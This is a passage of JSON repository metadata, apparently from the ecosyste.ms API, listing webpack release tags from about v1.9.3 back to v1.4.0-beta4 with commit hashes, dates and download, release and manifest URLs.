es/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe